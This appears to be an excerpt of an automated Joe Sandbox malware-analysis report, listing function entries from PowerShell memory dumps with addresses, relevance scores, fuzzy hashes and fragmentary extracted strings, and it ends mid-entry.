                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4a41049609796e01bfbc3e768da8f18cc63ef0d4d8f05264a129c42fff3dcdeb
                                                                                          • Instruction ID: 92bcc2f5b0622df928cb9e420323b6869749a2cdb5fa60b482c3873ecda35452
                                                                                          • Opcode Fuzzy Hash: 4a41049609796e01bfbc3e768da8f18cc63ef0d4d8f05264a129c42fff3dcdeb
                                                                                          • Instruction Fuzzy Hash: 14F0E53570D2904BD70A6774A5681ED3FB6AFC6625F0601AFE606CB343CEA80905D7D5
                                                                                          Function 04C6E92E Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 762369ad3abbf8e8bfa866d43f7bd18ffdfb9f9d8556d1c18b85237edbb4af17
                                                                                          • Instruction ID: 5f494561c2bcb9354d03bdef2584ee3c05ecaeabab904a509494f964ef4e2691
                                                                                          • Opcode Fuzzy Hash: 762369ad3abbf8e8bfa866d43f7bd18ffdfb9f9d8556d1c18b85237edbb4af17
                                                                                          • Instruction Fuzzy Hash: C5F05B39A01114DFCB00CF98E58999DFBB2FF88715B1A855AF905AB355CB31AD15CB40
                                                                                          Function 04C6AF88 Relevance: .0, Instructions: 28COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c49daea59f9139ce6d5ba6696332cbca53d030c917f29710828aab03bc02c21d
                                                                                          • Instruction ID: dbae751549b3af8dbcf9a99e2b28357f3ef417bc541fee4a4c8ed3c1e92c1f47
                                                                                          • Opcode Fuzzy Hash: c49daea59f9139ce6d5ba6696332cbca53d030c917f29710828aab03bc02c21d
                                                                                          • Instruction Fuzzy Hash: 14E0D81130E2D1178B1A813D64B04AAAFB749C3620319C1FEE085CF752CD5259068362
                                                                                          Function 04C69168 Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0c884066d6aba69ee2a2627c99f6f65264c4decad795d87037bbba427f2c266d
                                                                                          • Instruction ID: 6511482f80c804980dd5cd6d01d2ef6948bba64cc574446b654d5b51ee096a2f
                                                                                          • Opcode Fuzzy Hash: 0c884066d6aba69ee2a2627c99f6f65264c4decad795d87037bbba427f2c266d
                                                                                          • Instruction Fuzzy Hash: 95F06D749003044BD360DFB8D4DC39A7BEAEB44320F00446DE60EC7380DB3969808B90
                                                                                          Function 04C68978 Relevance: .0, Instructions: 24COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 80fd0231c99776c6a77a19a45418ba4ff3f45fd9dc460e42333cbce532e4d867
                                                                                          • Instruction ID: 68fbc75250c47c1e53069f029b83e5607c7af9dcdf2188546a8b95bf85e1007b
                                                                                          • Opcode Fuzzy Hash: 80fd0231c99776c6a77a19a45418ba4ff3f45fd9dc460e42333cbce532e4d867
                                                                                          • Instruction Fuzzy Hash: 0AE0263970422447CB093775A42C2EE7A5BEBC5725F01002EE70A8B341CFB85A0187D5
                                                                                          Function 04C69550 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4682853ec0a3c42c68e696578ab92a11623c6254434f2a64203395eea46341f4
                                                                                          • Instruction ID: 713aa41dfee06f305a6ed45e1b37438d145adc177dd84fcefd693980bfe04760
                                                                                          • Opcode Fuzzy Hash: 4682853ec0a3c42c68e696578ab92a11623c6254434f2a64203395eea46341f4
                                                                                          • Instruction Fuzzy Hash: 64D05E52713162171664B0FE18806BBA6CF8BC49A974581369A0BC7285EC60EC0153F1
                                                                                          Function 04C6DCE8 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                          • Instruction ID: 267245896663acd1c89cdaad6c006adef1262c23c83663893cc48a7392bbbd66
                                                                                          • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                          • Instruction Fuzzy Hash: 1EE08631B10014978B08995AD4504EDF7AADBCC220F04C07AD90BA7340DA32691586E1
                                                                                          Function 04C68739 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: acfbdc1fc2a12224d0b9e3399dbd5760fbfa0fc18f851ecbf5b9ada5470e15a8
                                                                                          • Instruction ID: 783451966dc947af47e5d5b37bd05f9ad3f991b0dda579eeaa826a09102da7c6
                                                                                          • Opcode Fuzzy Hash: acfbdc1fc2a12224d0b9e3399dbd5760fbfa0fc18f851ecbf5b9ada5470e15a8
                                                                                          • Instruction Fuzzy Hash: 75E02631D051498FCB08BBA1E97A4ED7F38FA01300B41009CF96347292EAB01A46CBC0
                                                                                          Function 04C68800 Relevance: .0, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2e278a646724c99852ff22d5a5240e6cc147ed59bca2180fc5938d672b3fb0e0
                                                                                          • Instruction ID: 45fdb35cec4e93c63785287d8422736b13d467a6b8f367b4e79465b9a21ee21c
                                                                                          • Opcode Fuzzy Hash: 2e278a646724c99852ff22d5a5240e6cc147ed59bca2180fc5938d672b3fb0e0
                                                                                          • Instruction Fuzzy Hash: C9E0D8309092868BCB08DFA8D15646DBFB1FF46204F10419DE95587302DA300505DF81
                                                                                          Function 04C6F460 Relevance: .0, Instructions: 17COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3bdab485cbad3dc33d1bd4723f67807ceaa8bf6cf11073fd1c030b966dfac1d6
                                                                                          • Instruction ID: 2aa638e2325ef95c6a3f69c9ae8c9d390a173e4af6979be2c4ab3ab9d2ebee4a
                                                                                          • Opcode Fuzzy Hash: 3bdab485cbad3dc33d1bd4723f67807ceaa8bf6cf11073fd1c030b966dfac1d6
                                                                                          • Instruction Fuzzy Hash: 34E04F709541869BC761CF7C84805A9FFE0DE5A264B14C2DED8698B291E6339502CFC0
                                                                                          Function 04C6F470 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                          • Instruction ID: fbd4142a6e5c1e95bb0c330afe460799a4e9d30eb39ef6462fed70f47bcb5eee
                                                                                          • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                          • Instruction Fuzzy Hash: B3D067B0D042099F8780EFADD94156EFBF4EB48200F64C5AE8919E7301F7329A12CBD1
                                                                                          Function 04C68748 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7c53b4f8a37b8ee8960b232bd7a85eb32a71b8d8e4410feeae9c6b5fb56ad192
                                                                                          • Instruction ID: d2cd992175c32cd2bfb42437690022d0df464c9ca60b5e38188283374dffa72e
                                                                                          • Opcode Fuzzy Hash: 7c53b4f8a37b8ee8960b232bd7a85eb32a71b8d8e4410feeae9c6b5fb56ad192
                                                                                          • Instruction Fuzzy Hash: EBD017318041098FCB08ABA5E86B4BDBB39FA00301F41416DF91756291EA302A4ACAC0
                                                                                          Function 04C68810 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9490fcd2858908c37570722459cf9eb90c80e9dae9fb7ac7ac366adf82645bf6
                                                                                          • Instruction ID: f68b26aecad0695a6582359f2ad475e37b3cc88b75450840b04d8f096ab1312d
                                                                                          • Opcode Fuzzy Hash: 9490fcd2858908c37570722459cf9eb90c80e9dae9fb7ac7ac366adf82645bf6
                                                                                          • Instruction Fuzzy Hash: 8ED01234E0420A8F8704EFA4D45646EBBB5EB44300F004159E94597340EA305901CFC1
                                                                                          Function 04C6791A Relevance: .0, Instructions: 14COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 208a05b7bb9b4be910188a61ea37a1ea126fdd515ec7d6cec71d177f05529424
                                                                                          • Instruction ID: 3155a8811e0c144d21acd98ad5a2b03013bc332b85241df67506c98b0aa31b22
                                                                                          • Opcode Fuzzy Hash: 208a05b7bb9b4be910188a61ea37a1ea126fdd515ec7d6cec71d177f05529424
                                                                                          • Instruction Fuzzy Hash: E4D0923444E3C49FC7168B7894948283F355E0312470908DED8869F5BBCABAC449CB16
                                                                                          Function 04C6EA57 Relevance: .0, Instructions: 14COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e0aef3def030cffc367102fe9b568c3440cf74ddb74a22167f0e6fae7f3a8002
                                                                                          • Instruction ID: 9051fac26342bdaa606dfb1828456a302829e4a01764c3e42b5dda7bbf78fe52
                                                                                          • Opcode Fuzzy Hash: e0aef3def030cffc367102fe9b568c3440cf74ddb74a22167f0e6fae7f3a8002
                                                                                          • Instruction Fuzzy Hash: A1D09239B44218CFDB04CB98E895A9CF371FF84329F1580A6E51AAB251CB32A916CB40
                                                                                          Function 04C67E90 Relevance: .0, Instructions: 13COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d675b7d8a913453bd0b61a9fe562be08eab52d60dc5e8c359774c8f6f18e8cd6
                                                                                          • Instruction ID: e32973a6932c6dffa6475cc1c44217f45009b9c2f1b55f97a1f03750c46b630f
                                                                                          • Opcode Fuzzy Hash: d675b7d8a913453bd0b61a9fe562be08eab52d60dc5e8c359774c8f6f18e8cd6
                                                                                          • Instruction Fuzzy Hash: 72C08C1000F3C00FEF0383394CA89017FB2094301C70A40CAD080CE463C9A88809CB23
                                                                                          Function 04C67928 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 19384ba88c2444edc57fbb33268ed452b649d483f7f343a2551d119245389db7
                                                                                          • Instruction ID: 514a8af8f48bbe082d78ba18193659607e8f99365507b193de57cc55de5104e3
                                                                                          • Opcode Fuzzy Hash: 19384ba88c2444edc57fbb33268ed452b649d483f7f343a2551d119245389db7
                                                                                          • Instruction Fuzzy Hash: B1B092301447088FC3486FB5A504824732DAF4061538004A8E80E4B6A78F7AE885CA44

                                                                                          Non-executed Functions

                                                                                          Function 07AE3928 Relevance: 12.8, Strings: 10, Instructions: 315COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1872944589.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_7ae0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq$$fq$l$l
                                                                                          • API String ID: 0-1448729859
                                                                                          • Opcode ID: 79f3974c5ac7e0a5fde042eeb580cfc76fdca30215c5c691eda7dec86a288b38
                                                                                          • Instruction ID: 7e733ef7e7a58b97dcb504fc2c9d30333da505dd41f4bb8f2419b3cb79643649
                                                                                          • Opcode Fuzzy Hash: 79f3974c5ac7e0a5fde042eeb580cfc76fdca30215c5c691eda7dec86a288b38
                                                                                          • Instruction Fuzzy Hash: D0A16AB17043059FCF249B79C81177ABFBAAFC6210F1480AAE566CB291DB35CC85C7A1
                                                                                          Function 04C6EBB8 Relevance: 10.2, Strings: 8, Instructions: 180COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ,jq$0omp$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                          • API String ID: 0-3782670052
                                                                                          • Opcode ID: 809a711e6518f2c6cce025c1d5558dfbdad6cea88084509b373e8bc279ce1563
                                                                                          • Instruction ID: 1868ef2772e2c938444eee8a81d28ae664c30c0fa106d4d57bf448a7edf9f4da
                                                                                          • Opcode Fuzzy Hash: 809a711e6518f2c6cce025c1d5558dfbdad6cea88084509b373e8bc279ce1563
                                                                                          • Instruction Fuzzy Hash: B85162783444148FCB29AB7A94D593D3BA7BF89B5031594ABE017CF3B2EE10EC419B52
                                                                                          Function 04C6EDE8 Relevance: 9.2, Strings: 7, Instructions: 453COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0omp$0omp$0omp$`Qfq$$fq$$fq$$fq
                                                                                          • API String ID: 0-4019838557
                                                                                          • Opcode ID: d51050d9ecd5a8f3449e751ad18f317ebe6dc2abc055593be79998eaaff5303a
                                                                                          • Instruction ID: f41b70833374bff7f22ecc91dfac4e556d8ba718498976bb92fdc75eee66c3e7
                                                                                          • Opcode Fuzzy Hash: d51050d9ecd5a8f3449e751ad18f317ebe6dc2abc055593be79998eaaff5303a
                                                                                          • Instruction Fuzzy Hash: C8E1E2747101108FDB24AB7D949463E77E7AFC9B10B2984AED903DB3A5EE20ED018792
                                                                                          Function 07AE1BE0 Relevance: 9.1, Strings: 7, Instructions: 393COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1872944589.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_7ae0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $ck$4'fq$4'fq$4'fq$4'fq$tPfq$tPfq
                                                                                          • API String ID: 0-889512230
                                                                                          • Opcode ID: a31e7fd0dd47a6c854e6fa4a8da4235f3e4559c204017c8b6a04f11031755619
                                                                                          • Instruction ID: 7c055abd658987ccbc9fa3f41e6482b2f7bf90bfa4fa1542d9dbaa86cb4b0e53
                                                                                          • Opcode Fuzzy Hash: a31e7fd0dd47a6c854e6fa4a8da4235f3e4559c204017c8b6a04f11031755619
                                                                                          • Instruction Fuzzy Hash: 4ED109B1B0521ACFCB259BACD45066BBBBAAFC5310F14807BD565CB292DB35CC81C7A1
                                                                                          Function 07AE3678 Relevance: 8.9, Strings: 7, Instructions: 187COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1872944589.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_7ae0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$$fq$$fq$$fq$l$l
                                                                                          • API String ID: 0-1664963280
                                                                                          • Opcode ID: 4191f9729ae28ad380ff3375966e206a3f6d28a419737d125acf081ca524ccf2
                                                                                          • Instruction ID: 59d3868df63dc81d77ce1c951280e040eef6c595d24d1e5655eadeb55ebcc465
                                                                                          • Opcode Fuzzy Hash: 4191f9729ae28ad380ff3375966e206a3f6d28a419737d125acf081ca524ccf2
                                                                                          • Instruction Fuzzy Hash: 5D5124F17042069FCF249B798811377BBBAAFC2611F24807BD565CB251DB35C881CBA2
                                                                                          Function 07AE0488 Relevance: 6.7, Strings: 5, Instructions: 475COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1872944589.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_7ae0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: fkq$4'fq$4'fq$4'fq$4'fq
                                                                                          • API String ID: 0-1499809691
                                                                                          • Opcode ID: 12052218f5b1f6820b915bd1c4c626bd51dbe502851e30fe2a4386fb2c918138
                                                                                          • Instruction ID: 8cf18828b45d2cd7be62fbbbddec5349a50971a349d6c739f803b3643edc4af3
                                                                                          • Opcode Fuzzy Hash: 12052218f5b1f6820b915bd1c4c626bd51dbe502851e30fe2a4386fb2c918138
                                                                                          • Instruction Fuzzy Hash: 6DF127B1B042458FC7259BB8941076BBFB6AFC2211F24C0BBD555CB652DAB5CC81CBA2
                                                                                          Function 04C64CB0 Relevance: 6.4, Strings: 5, Instructions: 160COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: m^$m^$m^$m^$m^
                                                                                          • API String ID: 0-393609038
                                                                                          • Opcode ID: da871c757a433de055884c0dbe03614db1fcc263f36328626f5dd9a8f588c5d9
                                                                                          • Instruction ID: 2a34c8f280571d752312440417c969624fec794aaf049484e14ea3c04bcf4b5d
                                                                                          • Opcode Fuzzy Hash: da871c757a433de055884c0dbe03614db1fcc263f36328626f5dd9a8f588c5d9
                                                                                          • Instruction Fuzzy Hash: CC51506160E3C15FC3079B3C98A46847FF1AF57298B4A41DBC5D4CF163EE24981AC756
                                                                                          Function 04C67A09 Relevance: 5.2, Strings: 4, Instructions: 241COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `gq$`gq$`gq$`gq
                                                                                          • API String ID: 0-3352594996
                                                                                          • Opcode ID: 2fd9811a3b6273587a0ef26f0a6a123e7ba5e08bcdd88bbd60aab3d121fda2bf
                                                                                          • Instruction ID: 026f1135264a2c9a228321c397fef745476693be2e03fcf2e8d5511fccc61c2c
                                                                                          • Opcode Fuzzy Hash: 2fd9811a3b6273587a0ef26f0a6a123e7ba5e08bcdd88bbd60aab3d121fda2bf
                                                                                          • Instruction Fuzzy Hash: EFB1B5B4E012099FDB55DFA9D980A9DFBF2FF88304F108629E419AB305DB34A945CF90
                                                                                          Function 04C67A18 Relevance: 5.2, Strings: 4, Instructions: 234COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `gq$`gq$`gq$`gq
                                                                                          • API String ID: 0-3352594996
                                                                                          • Opcode ID: efb9f7be4630a5ad9597aaa52b7260f157306589ea3b40f712b6f3092e1d5aff
                                                                                          • Instruction ID: c5fb3db8040273764049d67123c390781cc4b8bdce327fca1b886e53978eaa16
                                                                                          • Opcode Fuzzy Hash: efb9f7be4630a5ad9597aaa52b7260f157306589ea3b40f712b6f3092e1d5aff
                                                                                          • Instruction Fuzzy Hash: BBB196B4E012199FDB54DFA9D980A9DFBF2FF88304F108629E419AB345DB34A945CF90
                                                                                          Function 07AE5798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1872944589.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_7ae0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $fq$$fq$$fq$$fq
                                                                                          • API String ID: 0-2113499236
                                                                                          • Opcode ID: 88c752e5a86bfa88bafa588d13fc73b6051a8ffde9a9085a38aa79537ffc5b81
                                                                                          • Instruction ID: 4d5f4da8801baadb97e8d1949cc49bc5077b14ed93da08fcd2a0609034ee196b
                                                                                          • Opcode Fuzzy Hash: 88c752e5a86bfa88bafa588d13fc73b6051a8ffde9a9085a38aa79537ffc5b81
                                                                                          • Instruction Fuzzy Hash: 512147B1B002069BDB385A7EAC01727BBEF9BC175EF24843AE615CB381ED75C8508761
                                                                                          Function 07AE0308 Relevance: 5.1, Strings: 4, Instructions: 60COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1872944589.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_7ae0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$$fq$$fq
                                                                                          • API String ID: 0-2206495126
                                                                                          • Opcode ID: f6decf9e30f5a70d1ab1aae7a738eb3e0e25b63e330877312fd60c205a705f5d
                                                                                          • Instruction ID: 33ac92ba49d19532ffcc1ec098eb215a7d6dbc77325c2d367d8e81a71cb98537
                                                                                          • Opcode Fuzzy Hash: f6decf9e30f5a70d1ab1aae7a738eb3e0e25b63e330877312fd60c205a705f5d
                                                                                          • Instruction Fuzzy Hash: 96112B7170D7D64FC72E533C28202672FBA5FC3150B2D00DBD091DB292CA584D0583A7

                                                                                          Executed Functions

                                                                                          Function 00A6B490 Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: {Yr^$Yr^
                                                                                          • API String ID: 0-3839052442
                                                                                          • Opcode ID: 2c5d47c31aee193412f50e9d227563068eddc03438db14c7d841595128acc05c
                                                                                          • Instruction ID: bd06fcefe9f41ca92f883288811ce060f18d0ef796f133752df6faa313622cad
                                                                                          • Opcode Fuzzy Hash: 2c5d47c31aee193412f50e9d227563068eddc03438db14c7d841595128acc05c
                                                                                          • Instruction Fuzzy Hash: 669163B0F016159BDB19EFB589115AF7BF6EF84700B00892DE106AB358DF34AE058BC6
                                                                                          Function 072A3CE8 Relevance: 5.6, Strings: 4, Instructions: 582COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1954930567.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
